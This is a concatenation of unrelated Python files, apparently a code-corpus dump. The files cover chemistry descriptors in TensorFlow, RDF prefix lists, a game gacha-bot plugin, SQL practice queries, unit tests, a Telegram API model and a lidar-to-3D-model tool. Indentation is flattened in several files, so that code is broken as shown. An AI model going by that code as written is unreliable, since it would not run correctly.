cleaner_theta = tf.where(dummy_mask_3d, clean_theta, zeros_1)
# Finding the (0.5 * clean_sum_dist - R_s) term
with tf.name_scope("Exp_term"):
# Augmenting the dims of angular_rs
expanded_rs = tf.expand_dims(tf.expand_dims(tf.expand_dims(tf.expand_dims(angular_rs, axis=0), axis=0), axis=0),
axis=0) # (1, 1, 1, 1, n_rs)
# Augmenting the dim of clean_sum_dist *0.5
# expanded_sum = tf.expand_dims(clean_sum_dist * 0.5, axis=-1)
expanded_sum = tf.expand_dims(sum_dist_tensor * 0.5, axis=-1)
# Combining them
brac_term = tf.subtract(expanded_sum, expanded_rs)
# Finally making the exponential term
exponent = - eta * tf.square(brac_term)
exp_term = tf.exp(exponent) # (n_samples, n_atoms, n_atoms, n_atoms, n_rs)
# Finding the cos(theta - theta_s) term
with tf.name_scope("Cos_term"):
# Augmenting the dimensions of theta_s
expanded_theta_s = tf.expand_dims(tf.expand_dims(tf.expand_dims(tf.expand_dims(theta_s, axis=0), axis=0), axis=0),
axis=0)
# Augmenting the dimensions of theta
expanded_theta = tf.expand_dims(cleaner_theta, axis=-1)
# Subtracting them and do the cos
cos_theta_term = tf.cos(
tf.subtract(expanded_theta, expanded_theta_s)) # (n_samples, n_atoms, n_atoms, n_atoms, n_theta_s)
# Make the whole cos term of the sum
cos_term = tf.pow(tf.add(tf.ones(tf.shape(cos_theta_term), dtype=tf.float32), cos_theta_term),
zeta) # (n_samples, n_atoms, n_atoms, n_atoms, n_theta_s)
# Final product of terms inside the sum time by 2^(1-zeta)
expanded_fc = tf.expand_dims(tf.expand_dims(cleaner_fc_term, axis=-1), axis=-1, name="Expanded_fc")
expanded_cos = tf.expand_dims(cos_term, axis=-2, name="Expanded_cos")
expanded_exp = tf.expand_dims(exp_term, axis=-1, name="Expanded_exp")
const = tf.pow(tf.constant(2.0, dtype=tf.float32), (1.0 - zeta))
with tf.name_scope("Ang_term"):
prod_of_terms = const * tf.multiply(tf.multiply(expanded_cos, expanded_exp),
expanded_fc) # (n_samples, n_atoms, n_atoms, n_atoms, n_rs, n_theta_s)
# Reshaping to shape (n_samples, n_atoms, n_atoms, n_atoms, n_rs*n_theta_s)
presum_term = tf.reshape(prod_of_terms,
[tf.shape(prod_of_terms)[0], n_atoms, n_atoms, n_atoms,
theta_s.shape[0] * angular_rs.shape[0]])
return presum_term
def sum_rad(pre_sum, Zs, elements_list, radial_rs):
"""
Sum of the terms in the radial part of the symmetry function. The terms corresponding to the same neighbour identity
are summed together.
:param pre_sum: tf tensor of shape (n_samples, n_atoms, n_atoms, n_rs)
:param Zs: tf tensor of shape (n_samples, n_atoms)
:param elements_list: np.array of shape (n_elements,)
:param radial_rs: tf tensor of shape (n_rad_rs,)
:return: tf tensor of shape (n_samples, n_atoms, n_rad_rd * n_elements)
"""
n_atoms = Zs.get_shape().as_list()[1]
n_elements = len(elements_list)
n_rs = radial_rs.get_shape().as_list()[0]
## Making a matrix of all the possible neighbouring atoms
# No need to clean up diagonal elements because they are already set to zero in the presum term
neighb_atoms = tf.tile(tf.expand_dims(tf.expand_dims(Zs, axis=1), axis=-1),
multiples=[1, n_atoms, 1, n_rs]) # (n_samples, n_atoms, n_atoms, n_rs)
zeros = tf.zeros(tf.shape(pre_sum), dtype=tf.float32)
# Looping over all the possible elements in the system and extracting the relevant terms from the pre_sum term
pre_sum_terms = []
for i in range(n_elements):
element = tf.constant(elements_list[i], dtype=tf.int32)
equal_elements = tf.equal(neighb_atoms, element)
slice_presum = tf.where(equal_elements, pre_sum, zeros)
slice_sum = tf.reduce_sum(slice_presum, axis=[2])
pre_sum_terms.append(slice_sum)
# Concatenating the extracted terms.
final_term = tf.concat(pre_sum_terms, axis=-1, name="sum_rad")
# Cleaning up the dummy atoms descriptors
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
mask = tf.tile(tf.expand_dims(dummy_atoms, axis=-1), multiples=[1, 1, n_elements*n_rs])
# clean_final_term = tf.where(mask, final_term, tf.zeros(final_term.shape, dtype=tf.float32))
clean_final_term = tf.where(mask, final_term, tf.zeros(tf.shape(final_term), dtype=tf.float32))
return clean_final_term
def sum_ang(pre_sumterm, Zs, element_pairs_list, angular_rs, theta_s):
"""
    This function does the sum of the terms in the angular part of the symmetry function. Three body interactions where
    the two neighbours are the same elements are summed together.
    :param pre_sumterm: tf tensor of shape (n_samples, n_atoms, n_atoms, n_atoms, n_ang_rs * n_thetas)
:param Zs: tf tensor of shape (n_samples, n_atoms)
:param element_pairs_list: np array of shape (n_elementpairs, 2)
:param angular_rs: tf tensor of shape (n_ang_rs,)
:param theta_s: tf tensor of shape (n_thetas,)
:return: tf tensor of shape (n_samples, n_atoms, n_ang_rs * n_thetas * n_elementpairs)
"""
n_atoms = Zs.get_shape().as_list()[1]
n_pairs = len(element_pairs_list)
n_rs = angular_rs.get_shape().as_list()[0]
n_thetas = theta_s.get_shape().as_list()[0]
# Making the pair matrix
Zs_exp_1 = tf.expand_dims(tf.tile(tf.expand_dims(Zs, axis=1), multiples=[1, n_atoms, 1]), axis=-1)
Zs_exp_2 = tf.expand_dims(tf.tile(tf.expand_dims(Zs, axis=-1), multiples=[1, 1, n_atoms]), axis=-1)
neighb_pairs = tf.concat([Zs_exp_1, Zs_exp_2], axis=-1) # (n_samples, n_atoms, n_atoms, 2)
# Cleaning up diagonal elements
zarray = np.zeros((n_atoms, n_atoms, 2))
for i in range(n_atoms):
zarray[i, i, :] = 1
# Make a bool tensor of the indices
where_eq_idx = tf.tile(tf.expand_dims(tf.convert_to_tensor(zarray, dtype=tf.bool), axis=0),
multiples=[tf.shape(Zs)[0], 1, 1, 1]) # (n_samples, n_atoms, n_atoms, 2)
zeros = tf.zeros(tf.shape(neighb_pairs), dtype=tf.int32)
clean_pairs = tf.where(where_eq_idx, zeros, neighb_pairs)
# Sorting the pairs in descending order so that for example pair [7, 1] is the same as [1, 7]
sorted_pairs, _ = tf.nn.top_k(clean_pairs, k=2, sorted=True) # (n_samples, n_atoms, n_atoms, 2)
# Preparing to clean the sorted pairs from where there will be self interactions in the three-body-terms
oarray = np.ones((n_atoms, n_atoms, n_atoms))
for i in range(n_atoms):
for j in range(n_atoms):
for k in range(n_atoms):
if i == j or i == k or j == k:
oarray[i, j, k] = 0
# Make a bool tensor of the indices
where_self_int = tf.tile(tf.expand_dims(tf.convert_to_tensor(oarray, dtype=tf.bool), axis=0),
multiples=[tf.shape(Zs)[0], 1, 1, 1]) # (n_samples, n_atoms, n_atoms, n_atoms)
exp_self_int = tf.expand_dims(where_self_int, axis=-1) # (n_samples, n_atoms, n_atoms, n_atoms, 1)
zeros_large = tf.zeros(tf.shape(pre_sumterm), dtype=tf.float32, name="zero_large")
presum_terms = []
with tf.name_scope("Extract"):
for i in range(n_pairs):
# Making a tensor where all the elements are the pair under consideration
pair = tf.constant(element_pairs_list[i], dtype=tf.int32)
expanded_pair = tf.tile(
tf.expand_dims(tf.expand_dims(tf.expand_dims(pair, axis=0), axis=0), axis=0),
multiples=[tf.shape(Zs)[0], n_atoms, n_atoms, 1], name="expand_pair") # (n_samples, n_atoms, n_atoms, 2)
# Comparing which neighbour pairs correspond to the pair under consideration
equal_pair_mix = tf.equal(expanded_pair, sorted_pairs)
equal_pair_split1, equal_pair_split2 = tf.split(equal_pair_mix, 2, axis=-1)
            equal_pair = tf.tile(tf.expand_dims(tf.logical_and(equal_pair_split1, equal_pair_split2), axis=1),
                                 multiples=[1, n_atoms, 1, 1, 1]) # (n_samples, n_atoms, n_atoms, n_atoms, 1)
# Removing the pairs where the same atom is present more than once
int_to_keep = tf.logical_and(equal_pair, exp_self_int)
exp_int_to_keep = tf.tile(int_to_keep, multiples=[1, 1, 1, 1, n_rs * n_thetas])
# Extracting the terms that correspond to the pair under consideration
slice_presum = tf.where(exp_int_to_keep, pre_sumterm, zeros_large, name="sl_pr_s")
slice_sum = 0.5 * tf.reduce_sum(slice_presum, axis=[2, 3], name="sum_ang")
presum_terms.append(slice_sum)
# Concatenating all of the terms corresponding to different pair neighbours
final_term = tf.concat(presum_terms, axis=-1, name="concat_presum")
# Cleaning up the dummy atoms descriptors
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
mask = tf.tile(tf.expand_dims(dummy_atoms, axis=-1), multiples=[1, 1, n_thetas * n_rs * n_pairs])
clean_final_term = tf.where(mask, final_term, tf.zeros(tf.shape(final_term)))
return clean_final_term
def generate_parkhill_acsf(xyzs, Zs, elements, element_pairs, radial_cutoff, angular_cutoff,
radial_rs, angular_rs, theta_s, zeta, eta):
"""
This function generates the atom centred symmetry function as used in the Tensormol paper. Currently only tested for
single systems with many conformations. It requires the coordinates of all the atoms in each data sample, the atomic
charges for each atom (in the same order as the xyz), the overall elements and overall element pairs. Then it
requires the parameters for the ACSF that are used in the Tensormol paper: https://arxiv.org/pdf/1711.06385.pdf
:param xyzs: tensor of shape (n_samples, n_atoms, 3)
:param Zs: tensor of shape (n_samples, n_atoms)
:param elements: np.array of shape (n_elements,)
:param element_pairs: np.array of shape (n_elementpairs, 2)
:param radial_cutoff: scalar float
:param angular_cutoff: scalar float
:param radial_rs: np.array of shape (n_rad_rs,)
:param angular_rs: np.array of shape (n_ang_rs,)
:param theta_s: np.array of shape (n_thetas,)
:param zeta: scalar float
:param eta: scalar float
:return: a tf tensor of shape (n_samples, n_atoms, n_rad_rs * n_elements + n_ang_rs * n_thetas * n_elementpairs)
"""
with tf.name_scope("acsf_params"):
rad_cutoff = tf.constant(radial_cutoff, dtype=tf.float32)
ang_cutoff = tf.constant(angular_cutoff, dtype=tf.float32)
rad_rs = tf.constant(radial_rs, dtype=tf.float32)
ang_rs = tf.constant(angular_rs, dtype=tf.float32)
theta_s = tf.constant(theta_s, dtype=tf.float32)
zeta_tf = tf.constant(zeta, dtype=tf.float32)
eta_tf = tf.constant(eta, dtype=tf.float32)
## Calculating the radial part of the symmetry function
# First obtaining all the terms in the sum
with tf.name_scope("Radial_part"):
pre_sum_rad = acsf_rad(xyzs, Zs, rad_cutoff, rad_rs, eta_tf) # (n_samples, n_atoms, n_atoms, n_rad_rs)
with tf.name_scope("Sum_rad"):
# Then summing based on the identity of the atoms interacting
rad_term = sum_rad(pre_sum_rad, Zs, elements, rad_rs) # (n_samples, n_atoms, n_rad_rs*n_elements)
## Calculating the angular part of the symmetry function
# First obtaining all the terms in the sum
with tf.name_scope("Angular_part"):
pre_sum_ang = acsf_ang(xyzs, Zs, ang_cutoff, ang_rs, theta_s, zeta_tf, eta_tf) # (n_samples, n_atoms, n_atoms, n_atoms, n_thetas * n_ang_rs)
with tf.name_scope("Sum_ang"):
        # Then doing the sum based on the neighbouring pair identity
ang_term = sum_ang(pre_sum_ang, Zs, element_pairs, ang_rs, theta_s) # (n_samples, n_atoms, n_thetas * n_ang_rs*n_elementpairs)
with tf.name_scope("ACSF"):
acsf = tf.concat([rad_term, ang_term], axis=-1, name="acsf") # (n_samples, n_atoms, n_rad_rs*n_elements + n_thetas * n_ang_rs*n_elementpairs)
return acsf
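# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original module). It assumes the
# TensorFlow 1.x graph/session API, since the functions above rely on
# tf.matrix_set_diag and graph-mode tensors; all shapes, element lists and
# parameter values below are illustrative placeholders only.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    n_samples, n_atoms = 2, 4
    xyzs_in = tf.placeholder(tf.float32, shape=(n_samples, n_atoms, 3))
    zs_in = tf.placeholder(tf.int32, shape=(n_samples, n_atoms))
    elements = np.array([1, 6, 8])
    # Pairs are sorted in descending order to match the tf.nn.top_k sorting used in sum_ang
    element_pairs = np.array([sorted([a, b], reverse=True)
                              for i, a in enumerate(elements) for b in elements[i:]])
    acsf = generate_parkhill_acsf(xyzs_in, zs_in, elements, element_pairs,
                                  radial_cutoff=10.0, angular_cutoff=10.0,
                                  radial_rs=np.linspace(0.0, 10.0, 3),
                                  angular_rs=np.linspace(0.0, 10.0, 3),
                                  theta_s=np.linspace(0.0, 3.14, 3),
                                  zeta=8.0, eta=4.0)
    with tf.Session() as sess:
        feed = {xyzs_in: np.random.rand(n_samples, n_atoms, 3),
                zs_in: np.array([[8, 1, 1, 6]] * n_samples)}
        print(sess.run(acsf, feed_dict=feed).shape)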
|
python
|
# ro_prefixes.py
"""
Central list of prefixes commonly used with ROs
extended to support ro model updates and extensions for earth science (01/2017) by Raul Palma
"""
__authors__ = "Graham Klyne ([email protected]), Raul Palma"
__copyright__ = "Copyright 2011-2013, University of Oxford"
__license__ = "MIT (http://opensource.org/licenses/MIT)"
prefixes = (
[ ("rdf", "http://www.w3.org/1999/02/22-rdf-syntax-ns#")
, ("rdfs", "http://www.w3.org/2000/01/rdf-schema#")
, ("owl", "http://www.w3.org/2002/07/owl#")
, ("xml", "http://www.w3.org/XML/1998/namespace")
, ("xsd", "http://www.w3.org/2001/XMLSchema#")
, ("rdfg", "http://www.w3.org/2004/03/trix/rdfg-1/")
, ("ro", "http://purl.org/wf4ever/ro#")
, ("roevo", "http://purl.org/wf4ever/roevo#")
, ("roterms", "http://purl.org/wf4ever/roterms#")
, ("wfprov", "http://purl.org/wf4ever/wfprov#")
, ("wfdesc", "http://purl.org/wf4ever/wfdesc#")
, ("wf4ever", "http://purl.org/wf4ever/wf4ever#")
, ("ore", "http://www.openarchives.org/ore/terms/")
, ("ao", "http://purl.org/ao/")
, ("dcterms", "http://purl.org/dc/terms/")
, ("dc", "http://purl.org/dc/elements/1.1/")
, ("foaf", "http://xmlns.com/foaf/0.1/")
, ("minim", "http://purl.org/minim/minim#")
, ("result", "http://www.w3.org/2001/sw/DataAccess/tests/result-set#")
, ("roes", "http://w3id.org/ro/earth-science#")
, ("oa", "http://www.w3.org/ns/oa#")
, ("pav", "http://purl.org/pav/")
, ("swrc", "http://swrc.ontoware.org/ontology#")
, ("cito", "http://purl.org/spar/cito/")
, ("dbo", "http://dbpedia.org/ontology/")
, ("ov", "http://open.vocab.org/terms/")
, ("bibo", "http://purl.org/ontology/bibo/")
, ("prov", "http://www.w3.org/ns/prov#")
, ("geo", "http://www.opengis.net/ont/geosparql#")
, ("sf", "http://www.opengis.net/ont/sf#")
, ("gml", "http://www.opengis.net/ont/gml#")
, ("odrs", "http://schema.theodi.org/odrs#")
, ("cc", "http://creativecommons.org/ns#")
, ("odrl", "http://www.w3.org/ns/odrl/2/")
, ("geo-wgs84", "http://www.w3.org/2003/01/geo/wgs84_pos#")
, ("voag", "http://voag.linkedmodel.org/schema/voag#")
# Workaround hack until Minim prefix handling is sorted out
, ("chembox", "http://dbpedia.org/resource/Template:Chembox:")
])
extra_prefixes = (
[ ("", "http://example.org/")
])
def make_turtle_prefixes(extra_prefixes=[]):
return"\n".join([ "@prefix %s: <%s> ."%p for p in prefixes+extra_prefixes ]) + "\n\n"
def make_sparql_prefixes(extra_prefixes=[]):
return"\n".join([ "PREFIX %s: <%s>"%p for p in prefixes+extra_prefixes ]) + "\n\n"
turtle_prefixstr = make_turtle_prefixes(extra_prefixes)
sparql_prefixstr = make_sparql_prefixes(extra_prefixes)
prefix_dict = dict(prefixes)
# from rocommand.ro_prefixes import prefixes, prefix_dict, make_turtle_prefixes, make_sparql_prefixes, sparql_prefixstr
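# Illustrative example of the generated prefix strings (first lines only):
#   >>> print(make_turtle_prefixes())
#   @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
#   @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
#   ...
#   >>> print(make_sparql_prefixes())
#   PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
#   PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
#   ...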
|
python
|
import random
from lxml import etree
from typing import List
from PIL import ImageDraw
from nonebot.log import logger
try:
import ujson as json
except ModuleNotFoundError:
import json
from .base_handle import BaseHandle, BaseData
from ..config import draw_config
from ..util import remove_prohibited_str, cn2py, load_font
from ..create_img import CreateImg
class FgoData(BaseData):
pass
class FgoChar(FgoData):
pass
class FgoCard(FgoData):
pass
class FgoHandle(BaseHandle[FgoData]):
def __init__(self):
super().__init__("fgo", "命运-冠位指定")
self.data_files.append("fgo_card.json")
self.max_star = 5
self.config = draw_config.fgo
self.ALL_CHAR: List[FgoChar] = []
self.ALL_CARD: List[FgoCard] = []
def get_card(self, mode: int = 1) -> FgoData:
if mode == 1:
star = self.get_star(
[8, 7, 6, 5, 4, 3],
[
self.config.FGO_SERVANT_FIVE_P,
self.config.FGO_SERVANT_FOUR_P,
self.config.FGO_SERVANT_THREE_P,
self.config.FGO_CARD_FIVE_P,
self.config.FGO_CARD_FOUR_P,
self.config.FGO_CARD_THREE_P,
],
)
elif mode == 2:
star = self.get_star(
[5, 4], [self.config.FGO_CARD_FIVE_P, self.config.FGO_CARD_FOUR_P]
)
else:
star = self.get_star(
[8, 7, 6],
[
self.config.FGO_SERVANT_FIVE_P,
self.config.FGO_SERVANT_FOUR_P,
self.config.FGO_SERVANT_THREE_P,
],
)
if star > 5:
star -= 3
chars = [x for x in self.ALL_CHAR if x.star == star and not x.limited]
else:
chars = [x for x in self.ALL_CARD if x.star == star and not x.limited]
return random.choice(chars)
def get_cards(self, count: int, **kwargs) -> List[FgoData]:
        card_list = []  # all drawn cards
        servant_count = 0  # servant pity counter
        card_count = 0  # card (craft essence) pity counter
for _ in range(count):
servant_count += 1
card_count += 1
            if card_count == 9:  # four-star card pity
                mode = 2
            elif servant_count == 10:  # three-star servant pity
                mode = 3
            else:  # normal pull
                mode = 1
card = self.get_card(mode)
if isinstance(card, FgoCard) and card.star > self.max_star - 2:
card_count = 0
if isinstance(card, FgoChar):
servant_count = 0
card_list.append(card)
return card_list
def generate_card_img(self, card: FgoData) -> CreateImg:
sep_w = 5
sep_t = 5
sep_b = 20
w = 128
h = 140
bg = CreateImg(w + sep_w * 2, h + sep_t + sep_b)
img_path = str(self.img_path / f"{cn2py(card.name)}.png")
img = CreateImg(w, h, background=img_path)
bg.paste(img, (sep_w, sep_t), alpha=True)
        # Add the name
text = card.name[:6] + "..." if len(card.name) > 7 else card.name
font = load_font(fontsize=16)
text_w, text_h = font.getsize(text)
draw = ImageDraw.Draw(bg.markImg)
draw.text(
(sep_w + (w - text_w) / 2, h + sep_t + (sep_b - text_h) / 2),
text,
font=font,
fill="gray",
)
return bg
def _init_data(self):
self.ALL_CHAR = [
FgoChar(
name=value["名称"],
star=int(value["星级"]),
limited=True
if not ("圣晶石召唤" in value["入手方式"] or "圣晶石召唤(Story卡池)" in value["入手方式"])
else False,
)
for value in self.load_data().values()
]
self.ALL_CARD = [
FgoCard(name=value["名称"], star=int(value["星级"]), limited=False)
for value in self.load_data("fgo_card.json").values()
]
async def _update_info(self):
# fgo.json
fgo_info = {}
for i in range(500):
url = f"http://fgo.vgtime.com/servant/ajax?card=&wd=&ids=&sort=12777&o=desc&pn={i}"
result = await self.get_url(url)
if not result:
logger.warning(f"更新 {self.game_name_cn} page {i} 出错")
continue
fgo_data = json.loads(result)
if int(fgo_data["nums"]) <= 0:
break
for x in fgo_data["data"]:
name = remove_prohibited_str(x["name"])
member_dict = {
"id": x["id"],
"card_id": x["charid"],
"头像": x["icon"],
"名称": remove_prohibited_str(x["name"]),
"职阶": x["classes"],
"星级": int(x["star"]),
"hp": x["lvmax4hp"],
"atk": x["lvmax4atk"],
"card_quick": x["cardquick"],
"card_arts": x["cardarts"],
"card_buster": x["cardbuster"],
"宝具": x["tprop"],
}
fgo_info[name] = member_dict
        # Update extra info (acquisition method) for each servant
for key in fgo_info.keys():
url = f'http://fgo.vgtime.com/servant/{fgo_info[key]["id"]}'
result = await self.get_url(url)
if not result:
fgo_info[key]["入手方式"] = ["圣晶石召唤"]
logger.warning(f"{self.game_name_cn} 获取额外信息错误 {key}")
continue
try:
dom = etree.HTML(result, etree.HTMLParser())
obtain = dom.xpath(
"//table[contains(string(.),'入手方式')]/tr[8]/td[3]/text()"
)[0]
obtain = str(obtain).strip()
if "限时活动免费获取 活动结束后无法获得" in obtain:
obtain = ["活动获取"]
elif "非限时UP无法获得" in obtain:
obtain = ["限时召唤"]
else:
if "&" in obtain:
obtain = obtain.split("&")
else:
obtain = obtain.split(" ")
obtain = [s.strip() for s in obtain if s.strip()]
fgo_info[key]["入手方式"] = obtain
except IndexError:
fgo_info[key]["入手方式"] = ["圣晶石召唤"]
logger.warning(f"{self.game_name_cn} 获取额外信息错误 {key}")
self.dump_data(fgo_info)
logger.info(f"{self.game_name_cn} 更新成功")
# fgo_card.json
fgo_card_info = {}
for i in range(500):
url = f"http://fgo.vgtime.com/equipment/ajax?wd=&ids=&sort=12958&o=desc&pn={i}"
result = await self.get_url(url)
if not result:
logger.warning(f"更新 {self.game_name_cn}卡牌 page {i} 出错")
continue
fgo_data = json.loads(result)
if int(fgo_data["nums"]) <= 0:
break
for x in fgo_data["data"]:
name = remove_prohibited_str(x["name"])
member_dict = {
"id": x["id"],
"card_id": x["equipid"],
"头像": x["icon"],
"名称": name,
"星级": int(x["star"]),
"hp": x["lvmax_hp"],
"atk": x["lvmax_atk"],
"skill_e": str(x["skill_e"]).split("<br />")[:-1],
}
fgo_card_info[name] = member_dict
self.dump_data(fgo_card_info, "fgo_card.json")
logger.info(f"{self.game_name_cn} 卡牌更新成功")
    # Download avatars
for value in fgo_info.values():
await self.download_img(value["头像"], value["名称"])
for value in fgo_card_info.values():
await self.download_img(value["头像"], value["名称"])
|
python
|
"""Queries to answer following questions"""
# How many total Characters are there?
QUERY_1 = '''SELECT COUNT(*)
FROM charactercreator_character;'''
# How many of each specific subclass?
QUERY_2 = '''SELECT (
SELECT COUNT(*)
FROM charactercreator_thief
) AS thief_class,
(
SELECT COUNT(*)
FROM charactercreator_cleric
) AS cleric_class,
(
SELECT COUNT(*)
FROM charactercreator_fighter
) AS fighter_class,
(
SELECT COUNT(*)
FROM charactercreator_mage
LEFT JOIN charactercreator_necromancer
ON character_ptr_id = mage_ptr_id
WHERE mage_ptr_id IS NOT NULL
) AS Necromancer_class,
(SELECT COUNT(*)
FROM charactercreator_mage
LEFT JOIN charactercreator_necromancer
ON character_ptr_id = mage_ptr_id
WHERE mage_ptr_id IS NULL
) AS Mage_class'''
# How many total items?
QUERY_3 = '''SELECT COUNT(*)
FROM armory_item;'''
# How many of the items are weapons? How many are not?
QUERY_4 = '''SELECT COUNT(*)
FROM armory_weapon'''
QUERY_5 = '''SELECT COUNT(*)
FROM armory_item
LEFT JOIN armory_weapon
on item_id = item_ptr_id
WHERE item_ptr_id IS NULL;'''
# How many items does each character have? (return first 20 rows)
# How many weapons does each character have? (return first 20 rows)
# On average, how many items does each character have?
# On average, how many weapons does each character have?
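# Hedged sketches answering the four questions above. The bridge table
# charactercreator_character_inventory and its character_id / item_id columns
# are assumed from the usual Django naming convention and may need adjusting
# to the actual schema.
QUERY_6 = '''SELECT character_id, COUNT(item_id) AS item_count
FROM charactercreator_character_inventory
GROUP BY character_id
LIMIT 20;'''
QUERY_7 = '''SELECT inv.character_id, COUNT(weap.item_ptr_id) AS weapon_count
FROM charactercreator_character_inventory AS inv
LEFT JOIN armory_weapon AS weap
ON inv.item_id = weap.item_ptr_id
GROUP BY inv.character_id
LIMIT 20;'''
QUERY_8 = '''SELECT AVG(item_count)
FROM (SELECT character_id, COUNT(item_id) AS item_count
      FROM charactercreator_character_inventory
      GROUP BY character_id);'''
QUERY_9 = '''SELECT AVG(weapon_count)
FROM (SELECT inv.character_id, COUNT(weap.item_ptr_id) AS weapon_count
      FROM charactercreator_character_inventory AS inv
      LEFT JOIN armory_weapon AS weap
      ON inv.item_id = weap.item_ptr_id
      GROUP BY inv.character_id);'''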
|
python
|
from astutils import ast
def test_terminal():
value = 'a'
t = ast.Terminal(value)
r = repr(t)
assert r == "Terminal('a', 'terminal')", r
r = str(t)
assert r == 'a', r
r = len(t)
assert r == 1, r
r = t.flatten()
assert r == value, r
def test_hash():
# different AST node instances should
# have different hash
#
# terminals
value = 'foo'
a = ast.Terminal(value)
b = ast.Terminal(value)
assert hash(a) != hash(b)
# operators
op = 'bar'
a = ast.Operator(op)
b = ast.Operator(op)
assert hash(a) != hash(b)
def test_eq():
value = 'a'
t = ast.Terminal(value)
p = ast.Terminal(value)
assert t == p, (t, p)
p = ast.Terminal('b')
assert t != p, (t, p)
p = ast.Terminal(value, 'number')
assert t != p, (t, p)
p = 54
assert t != p, (t, p)
def test_operator():
a = ast.Terminal('a')
b = ast.Terminal('b')
op = '+'
operands = [a, b] # 'a', 'b' fail due to `str`
t = ast.Operator(op, *operands)
r = repr(t)
r_ = (
"Operator('+', "
"Terminal('a', 'terminal'), "
"Terminal('b', 'terminal'))")
assert r == r_, r
r = str(t)
assert r == '(+ a b)', r
r = len(t)
assert r == 3, r
r = t.flatten()
assert r == '( + a, b )', r
|
python
|
num1 = 111
num2 = 222
num3 = 3333333333
num3 = 333
num4 = 44444
|
python
|
# =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
from pydantic import Field
from ..base_object import BaseObject
class ToggleSupergroupIsAllHistoryAvailable(BaseObject):
"""
Toggles whether the message history of a supergroup is available to new members; requires can_change_info administrator right
:param supergroup_id: The identifier of the supergroup
:type supergroup_id: :class:`int`
:param is_all_history_available: The new value of is_all_history_available
:type is_all_history_available: :class:`bool`
"""
ID: str = Field("toggleSupergroupIsAllHistoryAvailable", alias="@type")
supergroup_id: int
is_all_history_available: bool
@staticmethod
def read(q: dict) -> ToggleSupergroupIsAllHistoryAvailable:
return ToggleSupergroupIsAllHistoryAvailable.construct(**q)
|
python
|
import os
import sys
import zipfile
import asc_parse
import wget
import multiprocessing
import urllib.request as request
from contextlib import closing
import argparse
import shutil
import glob
# A decimal value that will decrease the output file size as it increases
REDUCE_BY = 1.0
# A decimal value that will make artificially make things taller as it increases
VERTICAL_SCALE = 1.0
# A decimal value that sets the base height of the model
BASE_HEIGHT = 0.0
# Enable this option to merge all LAS tiles into a single DEM/STL; leave it disabled to generate a separate DEM/STL for each LAS tile.
MERGE_LAS = False
# Generate 3D models
GENERATE_STLS = True
# Delete LAS Directory when finished
DELETE_LAS = False
# Enabling this option will generate .prj files for each generated .asc file. This requires blast2dem,
# a closed source utility that is part of lastools. If you enable this option, lastools will be automatically
# downloaded and unzipped, however, the output may not be used for commercial purposes unless you purchase
# a lastools license. This option is only necessary if you plan on using the DEMto3D plugin that is part of
# QGIS. More information about lastools licensing is available here:
# https://lastools.github.io/LICENSE.txt
QGIS_COMPATIBLE_DEM = False
if getattr(sys, 'frozen', False):
APPLICATION_PATH = os.path.dirname(sys.executable)
elif __file__:
APPLICATION_PATH = os.path.dirname(__file__)
GRID_EXE = os.path.join(APPLICATION_PATH, "GridSurfaceCreate64.exe")
D2A_EXE = os.path.join(APPLICATION_PATH, "DTM2ASCII.exe")
LASZIP_EXE = os.path.join(APPLICATION_PATH, "laszip-cli.exe")
LASTOOLS_URL = "http://lastools.github.io/download/LAStools.zip"
BLAST2DEM_EXE = os.path.join(APPLICATION_PATH, "LAStools\\bin\\blast2dem.exe")
LAS2LAS_EXE = os.path.join(APPLICATION_PATH, "LAStools\\bin\\las2las.exe")
# lastools isn't completely free/open source, so we can't distribute it with the program.
def install_lastools():
file_name = wget.filename_from_url(LASTOOLS_URL)
if not os.path.exists(BLAST2DEM_EXE):
print('lastools missing, downloading...')
with closing(request.urlopen(LASTOOLS_URL)) as r:
with open(file_name, 'wb') as f:
shutil.copyfileobj(r, f)
with zipfile.ZipFile(file_name, "r") as zip_ref:
zip_ref.extractall("")
os.remove(file_name)
def get_file_from_url(url, file_name):
# This is a pattern you'll see several times. I don't want to have to
# redo the whole process if it fails along the way.
if os.path.exists(file_name):
print(f"{file_name} already downloaded, skipping...")
return
with closing(request.urlopen(url)) as r:
with open(file_name, 'wb') as f:
shutil.copyfileobj(r, f)
print(f"Downloaded {url}")
def unzip_to_las(file_name, las_name):
print(f'Unzipping {file_name}')
if os.path.exists(las_name):
print(f'{las_name} already exists, skipping...')
return
with zipfile.ZipFile(file_name, "r") as zip_ref:
zip_ref.extractall("LAS")
def generate_dem_from_las(las_name, dem_name, filter: float = None, reduce_by: float = 1.0):
    # Build the command locally so repeated calls do not keep appending the
    # spike filter to the global GRID_EXE string
    grid_cmd = GRID_EXE
    if filter:
        grid_cmd += f' /spike:{filter}'
    if os.path.exists(dem_name):
        print(f'{dem_name} already exists, skipping...')
        return
    print(f'Generating {dem_name}')
    os.system(f'{grid_cmd} {dem_name} {reduce_by} M M 0 0 0 0 {las_name}')
def unzip_laz_file(laz_name, las_name):
if os.path.exists(las_name):
print(f'{las_name} already exists, skipping...')
return
print(f'Unzipping {laz_name} to {las_name}')
os.system(f'{LASZIP_EXE} -i {laz_name} -o {las_name}')
def main():
global VERTICAL_SCALE
global BASE_HEIGHT
global REDUCE_BY
global MERGE_LAS
global GENERATE_STLS
global DELETE_LAS
global QGIS_COMPATIBLE_DEM
global GRID_EXE
parser = argparse.ArgumentParser(description='A utility for automatically generating 3D printable STLs from USGS lidar scans.')
# Just in case the user doesn't pass in the file name, assume it's what the USGS names it.
parser.add_argument('--input', '-i', type=str, default='downloadlist.txt', help='The name of the file containing the URLs of all of the lidar scan data.')
parser.add_argument('--reduce', '-r', type=float, default=REDUCE_BY, help='A decimal value that will decrease the output file size as it increases. The default value is 1.0')
parser.add_argument('--vscale', '-v', type=float, default=VERTICAL_SCALE, help='A decimal value that will make artificially make things taller as it increases. The default value is 1.0')
parser.add_argument('--base', '-b', type=float, default=BASE_HEIGHT, help='A decimal value that sets the base height of the model. The default value is 0.0')
